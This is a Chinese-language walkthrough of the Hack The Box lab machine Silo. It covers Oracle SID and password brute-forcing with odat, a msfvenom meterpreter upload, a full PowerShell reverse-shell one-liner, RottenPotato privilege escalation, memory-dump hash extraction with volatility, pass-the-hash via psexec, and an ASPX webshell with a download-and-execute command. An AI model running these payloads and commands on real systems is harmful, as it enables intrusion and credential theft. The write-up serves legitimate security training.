这台机器涉及到了oracle数据库,之前完全没有涉猎过,借此机会也是熟悉了一下这个数据库的操作方法;以及涉及到了关于内存取证方面的知识,正好上一次在美亚杯只是粗浅的学习了一下取证大师,则此也是借此机会好好的学习了一下取证相关知识
nmap -sC -sV 10.10.10.82 Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-09 13:15 CST Nmap scan report for 10.10.10.82 Host is up (0.073s latency). Not shown: 988 closed ports PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 8.5 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/8.5 |_http-title: IIS Windows Server 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds 1521/tcp open oracle-tns Oracle TNS listener 11.2.0.2.0 (unauthorized) 49152/tcp open msrpc Microsoft Windows RPC 49153/tcp open msrpc Microsoft Windows RPC 49154/tcp open msrpc Microsoft Windows RPC 49155/tcp open msrpc Microsoft Windows RPC 49159/tcp open oracle-tns Oracle TNS listener (requires service name) 49160/tcp open msrpc Microsoft Windows RPC 49161/tcp open msrpc Microsoft Windows RPC Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows Host script results: | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: supported | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2021-02-09T05:17:36 |_ start_date: 2021-02-09T03:07:49 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 152.90 seconds
可以看出来80端口开了iis8.5,搜索一下没有可以利用的漏洞,应该是个兔子洞
135,和五位数都是rpc没有可以利用漏洞
rpcclient -U '' 10.10.10.82 Enter WORKGROUP\'s password: Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
139和445可以看出对方系统的,并且共享文件夹中也没有东西
$smbclient -L //$ip/ Enter WORKGROUP\chris's password: session setup failed: NT_STATUS_ACCESS_DENIED ┌─[root@kali]─[~] └──╼ $smbmap -H $ip [!] 445 not open on 10.10.10.82....
1521是oracle-tns Oracle TNS listener这个是一个Oracle数据库的监听端口,有一个可以利用的漏洞
这种方法不需要获取www权限
首先安装odat,直接在kali中打odat然后就会自动开始安装
然后开始利用
~ odat sidguesser -s 10.10.10.82 [1] (10.10.10.82:1521): Searching valid SIDs [1.1] Searching valid SIDs thanks to a well known SID list on the 10.10.10.82:1521 server [+] 'XE' is a valid SID. Continue... ########## | ETA: 00:00:01 [+] 'XEXDB' is a valid SID. Continue... 100% |#######################################################| Time: 00:02:22 [1.2] Searching valid SIDs thanks to a brute-force attack on 1 chars now (10.10.10.82:1521) 100% |#######################################################| Time: 00:00:05 [1.3] Searching valid SIDs thanks to a brute-force attack on 2 chars now (10.10.10.82:1521) [+] 'XE' is a valid SID. Continue... #### | ETA: 00:00:15 100% |#######################################################| Time: 00:02:22 [+] SIDs found on the 10.10.10.82:1521 server: XE,XEXDB
发现了两个可用的sid,经过试验可用的是XE
同样这一步可以使用msf来对sid进行猜测
use scanner/oracle/sid_enum记得换一个大一点的字典
”/usr/share/metasploit-framework/data/wordlists/sid.txt“
用户密码爆破
然后爆破用户名密码:
➜ ~ sudo odat passwordguesser -s 10.10.10.82 -p 1521 -d XE --accounts-file /usr/share/odat/accounts/accounts_small.txt [+] Valid credentials found: scott/tiger. Continue...
然后我还看到了一种odat其他的用法
过后我会在研究odat的文章中再详细学习和解释
odat all -s 10.10.10.82 -p 1521 -d XE --snipped-- +] Valid credentials found: scott/tiger. Continue... --snipped--
还有一个0xdf大佬自己编写的爆破密码的脚本HTB: Silo | 0xdf hacks stuff
#!/usr/bin/env python import cx_Oracle import sys from multiprocessing import Pool MAX_PROC = 50 host = "10.10.10.82" sid = "XE" def usage(): print("{} [ip] [wordlist]".format(sys.argv[0])) print(" wordlist should be of the format [username]:[password]") sys.exit(1) def scan(userpass): u, p = userpass.split(':')[:2] try: conn = cx_Oracle.connect('{user}/{pass_}@{ip}/{sid}'.format(user=u, pass_=p, ip=host, sid=sid)) return u, p, True except cx_Oracle.DatabaseError: return u, p, False def main(host, userpassfile, nprocs=MAX_PROC): with open(userpassfile, 'r') as f: userpass = f.read().rstrip().replace('\r','').split('\n') pool = Pool(processes=nprocs) for username, pass_, status in pool.imap_unordered(scan, [up for up in userpass]): if status: print("Found {} / {}\n\n".format(username, pass_)) else: sys.stdout.write("\r {}/{} ".format(username, pass_)) if __name__ == '__main__': if len(sys.argv) != 3: usage() main(sys.argv[1], sys.argv[2])
数据库里没什么东西,这里用的是上传恶意文件执行:
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.10.14.5 lport=4445 -f exe > 1.exe odat utlfile -s 10.10.10.82 -p 1521 -U scott -P tiger -d XE --sysdba --putFile c:/ 1.exe ~/1.exe odat externaltable -s 10.10.10.82 -p 1521 -U scott -P tiger -d XE --sysdba --exec c:/ 1.exe
执行脚本前记得用msf打开监听
msf6 > use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcp msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp payload => windows/x64/meterpreter/reverse_tcp msf6 exploit(multi/handler) > set lhost 10.10.16.7 lhost => 10.10.16.7 msf6 exploit(multi/handler) > set lport 4445 lport => 4445 msf6 exploit(multi/handler) > run [*] Started reverse TCP handler on 10.10.16.7:4445 [*] Sending stage (200262 bytes) to 10.10.10.82 [*] Meterpreter session 1 opened (10.10.16.7:4445 -> 10.10.10.82:49167) at 2022-01-05 14:24:14 +0800
就行了
用odat直接读取文件
odat ctxsys -s 10.10.10.82 -d XE -U SCOTT -P tiger --sysdba --getFile c:\\users\\administrator\\desktop\\root.txt [1] (10.10.10.82:1521): Read the c:\users\administrator\desktop\root.txt file on the 10.10.10.82 server [+] Data stored in the c:\users\administrator\desktop\root.txt file (escape char replace by '\n'): 82FDAB14799E467FCE23979F9C1BF92C
感谢0xdf的思路
当我们在一个普通权限下通过whoami /priv发现SeImpersonatePrivilege证明我们可以使用RottenPotato提权
PS C:\windows\system32\inetsrv>whoami /priv PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= ========================================= ======== SeAssignPrimaryTokenPrivilege Replace a process level token Disabled SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled SeAuditPrivilege Generate security audits Disabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeImpersonatePrivilege Impersonate a client after authentication Enabled SeCreateGlobalPrivilege Create global objects Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
我们下载MSFRottenPotato.exeGitHub - decoder-it/juicy-potato: A sugared version of RottenPotatoNG, with a bit of juice, i.e. another Local Privilege Escalation tool, from a Windows Service Accounts to NT AUTHORITYSYSTEM.
然后编译一个bat文件
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.14',8085); $stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0}; while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){ ;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i); $sendback = (IEX $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> '; $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}; $client.Close()"
然后下载
PS C:\temp> (new-object net.webclient).downloadfile('http://10.10.14.14:8083/rev.bat', 'C:\temp\rev.bat') PS C:\temp> (new-object net.webclient).downloadfile('http://10.10.14.14:8083/MSFRottenPotato.exe', 'C:\temp\lp.exe')
之后运行脚本
PS C:\temp> c:\temp\lp.exe * \temp\rev.bat connect sock CreateIlok: 0 0 start RPC connection CreateDoc: 0 0 COM -> bytes received: 116 RPC -> bytes Sent: 116 RPC -> bytes received: 84 COM -> bytes sent: 84 COM -> bytes received: 24 RPC -> bytes Sent: 24 RPC -> bytes received: 132 COM -> bytes sent: 132 COM -> bytes received: 127 RPC -> bytes Sent: 127 RPC -> bytes received: 196 COM -> bytes sent: 196 COM -> bytes received: 243 RPC -> bytes Sent: 243 RPC -> bytes received: 192 COM -> bytes sent: 192 COM -> bytes received: 72 RPC -> bytes Sent: 72 RPC -> bytes received: 60 COM -> bytes sent: 60 COM -> bytes received: 42 RPC -> bytes Sent: 42 RPC -> bytes received: 56 COM -> bytes sent: 56 CoGet: -2147022986 0 [+] authresult != -1 [+] Elevated Token tye:2 [+] DuplicateTokenEx :1 0 [+] Duped Token type:1 [+] Running \temp\rev.bat sessionId 1 [+] CreateProcessWithTokenW OK Auth result: 0 Return code: 0 Last error: 0
记得打开nc监听
root@kali:~/hackthebox/silo-10.10.10.82# nc -lnvp 8085 listening on [any] 8085 ... connect to [10.10.14.14] from (UNKNOWN) [10.10.10.82] 49181 PS C:\Windows\system32> whoami nt authority\system
在用户的桌面上我们会发现不止有flag还有一个issue.txt文件
dir \users\Phineas\Desktop Directory: C:\users\Phineas\Desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -a--- 1/5/2018 10:56 PM 300 Oracle issue.txt -a--- 1/4/2018 9:41 PM 32 user.txt
打开后发现文件中写了,内存备份文件存放在网盘里,密码也有
Support vendor engaged to troubleshoot Windows / Oracle performance issue (full memory dump requested): Dropbox link provided to vendor (and password under separate cover). Dropbox link https://www.dropbox.com/sh/69skryzfszb7elq/AADZnQEbbqDoIf5L2d0PBxENa?dl=0 link password: £%Hm8646uC$
那么下载下来用volatility来尝试内存取证
volatility kdbgscan -f SILO-20180105-221806.dmp ************************************************** Instantiating KDBG using: Unnamed AS Win2012R2x64_18340 (6.3.9601 64bit) Offset (V) : 0xf80078520a30 Offset (P) : 0x2320a30 KdCopyDataBlock (V) : 0xf8007845f9b0 Block encoded : Yes Wait never : 0xd08e8400bd4a143a Wait always : 0x17a949efd11db80 KDBG owner tag check : True Profile suggestion (KDBGHeader): Win2012R2x64_18340 Version64 : 0xf80078520d90 (Major: 15, Minor: 9600) Service Pack (CmNtCSDVersion) : 0 Build string (NtBuildLab) : 9600.16384.amd64fre.winblue_rtm. PsActiveProcessHead : 0xfffff80078537700 (51 processes) PsLoadedModuleList : 0xfffff800785519b0 (148 modules) KernelBase : 0xfffff8007828a000 (Matches MZ: True) Major (OptionalHeader) : 6 Minor (OptionalHeader) : 3 KPCR : 0xfffff8007857b000 (CPU 0) KPCR : 0xffffd000207e8000 (CPU 1) ************************************************** ...
之后尝试获得账号的hash
volatility -f SILO-20180105-221806.dmp --profile Win2012R2x64 hivelist Volatility Foundation Volatility Framework 2.6 Virtual Physical Name ------------------ ------------------ ---- 0xffffc0000100a000 0x000000000d40e000 \??\C:\Users\Administrator\AppData\Local\Microsoft\Windows\UsrClass.dat 0xffffc000011fb000 0x0000000034570000 \SystemRoot\System32\config\DRIVERS 0xffffc00001600000 0x000000003327b000 \??\C:\Windows\AppCompat\Programs\Amcache.hve 0xffffc0000001e000 0x0000000000b65000 [no name] 0xffffc00000028000 0x0000000000a70000 \REGISTRY\MACHINE\SYSTEM 0xffffc00000052000 0x000000001a25b000 \REGISTRY\MACHINE\HARDWARE 0xffffc000004de000 0x0000000024cf8000 \Device\HarddiskVolume1\Boot\BCD 0xffffc00000103000 0x000000003205d000 \SystemRoot\System32\Config\SOFTWARE 0xffffc00002c43000 0x0000000028ecb000 \SystemRoot\System32\Config\DEFAULT 0xffffc000061a3000 0x0000000027532000 \SystemRoot\System32\Config\SECURITY 0xffffc00000619000 0x0000000026cc5000 \SystemRoot\System32\Config\SAM 0xffffc0000060d000 0x0000000026c93000 \??\C:\Windows\ServiceProfiles\NetworkService\NTUSER.DAT 0xffffc000006cf000 0x000000002688f000 \SystemRoot\System32\Config\BBI 0xffffc000007e7000 0x00000000259a8000 \??\C:\Windows\ServiceProfiles\LocalService\NTUSER.DAT 0xffffc00000fed000 0x000000000d67f000 \??\C:\Users\Administrator\ntuser.dat root@kali:~/hackthebox/silo-10.10.10.82# volatility -f SILO-20180105-221806.dmp --profile Win2012R2x64 hashdump -y 0xffffc00000028000 -s 0xffffc00000619000 Volatility Foundation Volatility Framework 2.6 Administrator:500:aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Phineas:1002:aad3b435b51404eeaad3b435b51404ee:8eacdd67b77749e65d3b3d5c110b0969:::
最后尝试用psexec用hash登录
psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7 -target-ip 10.10.10.82 administrator@10.10.10.82 Impacket v0.9.16-dev - Copyright 2002-2018 Core Security Technologies [*] Requesting shares on 10.10.10.82..... [*] Found writable share ADMIN$ [*] Uploading file XryxqKFr.exe [*] Opening SVCManager on 10.10.10.82..... [*] Creating service PAYb on 10.10.10.82..... [*] Starting service PAYb..... [!] Press help for extra shell commands Microsoft Windows [Version 6.3.9600] (c) 2013 Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami nt authority\system
这里因为我由于直接利用了odat脚本,所以在渗透过程中甚至拿到了数据库的账号密码也没有登进去看看,这里在整理笔记的时候看看别人的思路整理了一份,登录数据库的步骤(我的机器里甚至没有安装oracle,后期在安装数据库的时候真的是特别痛苦)
在HTB: Silo - PurpleRabbit这篇文章中,讲解了,不需要安装oracle数据库,只需要使用sqlplus就可以登陆进去的方法,我这里先写一下它的方法
sqlplus scott/tiger@$10.10.10.84:1521/XE SQL> select table_name from user_tables; TABLE_NAME ------------------------------ DEPT EMP BONUS SALGRADE SQL> select * from user_role_privs; USERNAME GRANTED_ROLE ADM DEF OS_ ------------------------------ ------------------------------ --- --- --- SCOTT CONNECT NO YES NO SCOTT RESOURCE NO YES NO
发现他数据库里没什么东西
思路来源于0xdf
通过
root@kali:~/hackthebox/silo-10.10.10.82# odat dbmsadvisor -s 10.10.10.82 -d XE -U SCOTT -P tiger --sysdba --putFile C:\\inetpub\\wwwroot 0xdf.aspx /usr/share/webshells/aspx/cmdasp.aspx [1] (10.10.10.82:1521): Put the /usr/share/webshells/aspx/cmdasp.aspx local file in the C:\inetpub\wwwroot path (named 0xdf.aspx) of the 10.10.10.82 server [+] The /usr/share/webshells/aspx/cmdasp.aspx local file was put in the remote C:\inetpub\wwwroot path (named 0xdf.aspx)
上传一个web命令执行脚本,然后通过之前的iis8.5来执行
然后我们通过这个命令行来远程下载我们的shell转发脚本
在本地打开web服务 python -m SimpleHTTPServer 80 然后在命令行 powershell IEX(New-Object Net.WebClient).downloadString('http://10.10.15.48:80/Invoke-PowerShellTcp.ps1')
获得一个转发shell